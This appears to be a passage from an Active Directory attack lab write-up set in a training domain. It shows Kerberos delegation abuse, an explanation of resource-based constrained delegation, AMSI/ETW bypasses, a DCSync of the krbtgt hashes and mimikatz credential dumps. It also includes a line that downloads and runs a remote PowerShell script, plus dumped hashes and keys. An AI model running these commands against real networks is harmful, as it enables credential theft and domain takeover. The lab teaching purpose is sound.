lRrH3JQiSse2H26g86EMppMAyBTd2DT+iOhgtAInFRvdC9MWDmx9K+QLviz83TfQnDH0uypx55Sp0cvL
UhtMJKPeaepPH6hGKRe0EvtH8DWPX238bJA23NCAhz1FiAipWXLnLS2oKJ2JETNFyDNsvnflBIhIlKH1
EsxBUhU6WVqtbEYyEGDZcAPva1vvLxTEa9uy/umRYTtO0PfraJEblBBa2Dn047bx8sqUfyNLPdu6QkbL
Hw8seO5RzKxynN/YTBfeQfbTEsI6w3UpA98d1XnVmtrvUU9LNnRFDKEkw1h+K9AVLT0qL1mw8pYSqqEe
yI+DJG72RB+a3HdhCuYaequKQdAjl5L+r2YRLDO6wsIYltAeGWE1F8J4zY2zrTDbUmDangh2+2m/Qp+T
 +GnV/fco8pHkrAypeaH+nkCl2Ld5FYxIPKtIc5YTpfH/9KlEW/1I8OMBscq5YamCm1KHwopJNM84rpXK
bpmDixEAS74AQDJgUtF9bNObj+v+frIH49rSmVU00Q9aqdodALDUCCKUWBslKBkzV+8+KUZTiTs6y3pn
EsTK0dzXP83VaCEItX7c2Lsu4hrPSTST1v3C4l2vv9yvUdBTrH9LUvTPZLs2sj9fb8bRlrAMxRDwzbtA
0TiXUXAIYgOUpgSMl3r05IzouhuNPN4pMnrCcbxsr7aVOPR9Dnr/RnykhjMngvl+quGLasvK6P1MSa/r
tipBH4NqEQ6cwY/5WSb9FEgC3Wlzet3lcXnXIoE0A30OpKSXHTIKOmoiqOmrr6fYwqOCAQIwgf+gAwIB
AKKB9wSB9H2B8TCB7qCB6zCB6DCB5aArMCmgAwIBEqEiBCDpJfKZWXxjJfZtccUo/+YQAurUMTEoYTuZ
JuwWH1RS36EcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0
cmF0b3KjBwMFAEChAAClERgPMjAyNDA3MDMxNzM1NDhaphEYDzIwMjQwNzA0MDMzNTQ4WqcRGA8yMDI0
MDcxMDE3MzU0OFqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypHDAaoAMCAQGhEzARGw9EQ09S
UC1BRE1JTlNSViQ=

[*] Impersonating user 'Administrator' to target SPN 'TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL'

[*] Final ticket will be for the alternate service 'LDAP'
[*] Building S4U2proxy request for service: 'TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'LDAP'
[*] base64(ticket.kirbi) for SPN 'LDAP/dcorp-dc.dollarcorp.moneycorp.LOCAL':

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
[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x2125aa

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: LDAP/dcorp-dc.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate
name_canonicalize
Start Time: 7/3/2024 10:35:49 (local)
End Time: 7/3/2024 20:35:48 (local)
Renew Time: 7/10/2024 10:35:48 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"

"lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
 answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
 05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

mimikatz(commandline) # exit
Bye!

Resource based Constrained Delegation

Resource based Constrained Delegation was introduced in Windows Server 2012.

In unconstrained and constrained Kerberos delegation, a computer/user is told what resources it can
delegate authentications to;

In resource based Kerberos delegation, computers (resources) specify who they trust and who can
delegate authentications to them. Resource-based delegation is controlled by the msDS-
AllowedToActOnBehalfOfOtherIdentity attribute; it stores a security descriptor for the object that can
access the resource. Unlike the other delegations, this doesn’t require Domain admin Privileges to
configure.

For our example, we have an user who is trying to authenticate to a backend database through a front
end web server. We assume that the user is logging on to the Web Server using a non-Kerberos protocol
like NTLM, Form-Authentication etc.

Step-1: The user authenticates to the Web Server using a non-Kerberos protocol.

Step-2: Since the user has authenticated to the Web Server using a non-Kerberos protocol, the user
doesn’t have a service ticket which the Web Server can use to invoke s42uproxy.

Step-3: The Web Server on behalf of the user requests a service ticket with its own TGT and the target
service is the Web Server itself. This is s4u2self.
Step-4: The DC receives this request and now in this case, the Web Server does not have the attribute
"TRUSTED_TO_AUTH_FOR_DELEGATION" set on it, since this is not Constrained Delegation.

Step-5: The Domain Controller receives the request and since Web server does not have the attribute
"TRUSTED_TO_AUTH_FOR_DELEGATION" set on it, it sends a non-forwardable service ticket (This service
ticket cannot be used to access remote services) on behalf of the user to the Web Server. In case of
Constrained Delegation, the domain Controller sends the Web Server a forwardable service ticket. By
default, all the Service tickets are forwardable.

Step-6: The Web Service receives the service ticket and stores it.

Step-7: Now the Web Server on behalf of the client requests a service ticket to the backend database. In
this request it includes its own TGT and the non-forwardable service ticket which it obtained by invoking
s4u2self. (This is the s4u2proxy)

Step-8: The DC receives the request from the Web Server and decrypts the service ticket (from s4u2self)
(Along with the Web Server’s TGT) and confirms that the user has authenticated to the Web Server.

Step-8: The DC then verifies if the attribute msDS-AllowedToActOnBehalfOfOtherIdentity on the database

to check if the Web Server can be trusted for Delegation. Once the Domain Controller determines that
Web Server is allowed for delegation, it now sends a service ticket (Forwardable) of the database.

Step-9: The Web server then presents the new service ticket to the Database server which it decrypts.

Step-10: AP-REP using mutual session key between the Database server and the Web Server

Step-11: The Web server responds to the user using the initial protocol with which the user has
authenticated.

Attacking Resource based constrained delegation

We would need two privileges.

• Write permissions on a target service or object to configure msDS-

AllowedToActOnBehalfOfOtherIdentity
• Control over an object which has SPN configured (like admin access to a domain joined machine
or ability to join a machine to a domain - ms-Ds-MachineAccountQuota is 10 for all domain users)

In our lab, the user ciadmin has write access on the domain object DCORP-MGMT.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Find-InterestingDomainAcl | ? {$_.identityreferencename -match 'ciadmin'
}

ObjectDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : user

We previously abused a Jenkins feature and obtained foothold on the machine dcorp-ci as ciadmin. We
will again get foothold on the machine dcorp-ci as ciadmin. To check if Resource based Constraint
delegation is enabled, we need to load PowerView and use the function Get-DomainRBCD.
PS C:\Users\Administrator\.jenkins\workspace\Project9> iex ((New-Object
Net.WebClient).DownloadString('http://172.16.100.163/PowerView.ps1'))
PS C:\Users\Administrator\.jenkins\workspace\Project9> Get-DomainRBCD

Since we did not get any results, we need to configure Resource based Constraint delegation. Since we
have administrator access to our student machine, we will specify our machine account to impersonate
other users.
PS C:\Users\Administrator\.jenkins\workspace\Project9> Set-DomainRBCD -Identity dcorp-mgmt -
DelegateFrom 'dcorp-std163$'
PS C:\Users\Administrator\.jenkins\workspace\Project9> Get-DomainRBCD

SourceName : DCORP-MGMT$
SourceType : MACHINE_ACCOUNT
SourceSID : S-1-5-21-719815819-3726368948-3917688648-1108
SourceAccountControl : WORKSTATION_TRUST_ACCOUNT
SourceDistinguishedName : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
ServicePrincipalName : {WSMAN/dcorp-mgmt, WSMAN/dcorp-mgmt.dollarcorp.moneycorp.local,
TERMSRV/DCORP-MGMT,
TERMSRV/dcorp-mgmt.dollarcorp.moneycorp.local...}
DelegatedName : DCORP-STD163$
DelegatedType : MACHINE_ACCOUNT
DelegatedSID : S-1-5-21-719815819-3726368948-3917688648-13683
DelegatedAccountControl : WORKSTATION_TRUST_ACCOUNT
DelegatedDistinguishedName : CN=DCORP-
STD163,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local

The output could be read as follows.

If we could compromise the machine DCORP-STD163 we can access any service on the machine DCORP-
MGMT as any user including domain admin.
For this we will dump the password of our student machine account.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"sekurlsa::ekeys"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 2158197 (00000000:0020ee75)

Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 10:21:55 AM
SID : S-1-5-90-0-3

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 43328 (00000000:0000a940)

Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 8:03:04 AM
SID : S-1-5-90-0-1

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
 * Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 996 (00000000:000003e4)

Session : Service from 0
User Name : DCORP-STD163$
Domain : dcorp
Logon Server : (null)
Logon Time : 7/3/2024 8:03:03 AM
SID : S-1-5-20

* Username : dcorp-std163$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 58e2540d3c585257e36efe54009a6f2024c68dcced255254d25c4d0d812da2d2
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 7928062 (00000000:0078f8fe)

Session : Interactive from 0
User Name : student163
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/3/2024 10:06:27 PM
SID : S-1-5-21-719815819-3726368948-3917688648-13603

* Username : student163
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8226ea65b512e5ff7e08814ae667503fc85993af3bc5932d92a8afe41760f868
rc4_hmac_nt ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_md4 ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_nt_exp ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old_exp ccbca8c20310dbc0c5c9dcf1fde108b8

Authentication Id : 0 ; 7413497 (00000000:00711ef9)

Session : Interactive from 0
User Name : student163
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/3/2024 9:06:31 PM
SID : S-1-5-21-719815819-3726368948-3917688648-13603

* Username : student163
* Domain : DOLLARCORP.MONEYCORP.LOCAL
 * Password : (null)
* Key List :
aes256_hmac 8226ea65b512e5ff7e08814ae667503fc85993af3bc5932d92a8afe41760f868
rc4_hmac_nt ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_md4 ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_nt_exp ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old_exp ccbca8c20310dbc0c5c9dcf1fde108b8

Authentication Id : 0 ; 2172513 (00000000:00212661)

Session : RemoteInteractive from 3
User Name : student163
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/3/2024 10:21:56 AM
SID : S-1-5-21-719815819-3726368948-3917688648-13603

* Username : student163
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8226ea65b512e5ff7e08814ae667503fc85993af3bc5932d92a8afe41760f868
rc4_hmac_nt ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_md4 ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_nt_exp ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old_exp ccbca8c20310dbc0c5c9dcf1fde108b8

Authentication Id : 0 ; 2172330 (00000000:002125aa)

Session : RemoteInteractive from 3
User Name : student163
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/3/2024 10:21:56 AM
SID : S-1-5-21-719815819-3726368948-3917688648-13603

* Username : student163
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8226ea65b512e5ff7e08814ae667503fc85993af3bc5932d92a8afe41760f868
rc4_hmac_nt ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_md4 ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_nt_exp ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old_exp ccbca8c20310dbc0c5c9dcf1fde108b8

Authentication Id : 0 ; 2158170 (00000000:0020ee5a)

Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 10:21:55 AM
SID : S-1-5-90-0-3

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
 * Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 2157108 (00000000:0020ea34)

Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 10:21:55 AM
SID : S-1-5-96-0-3

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 43395 (00000000:0000a983)

Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 8:03:04 AM
SID : S-1-5-90-0-1

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 24385 (00000000:00005f41)

Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 8:03:03 AM
SID : S-1-5-96-0-0
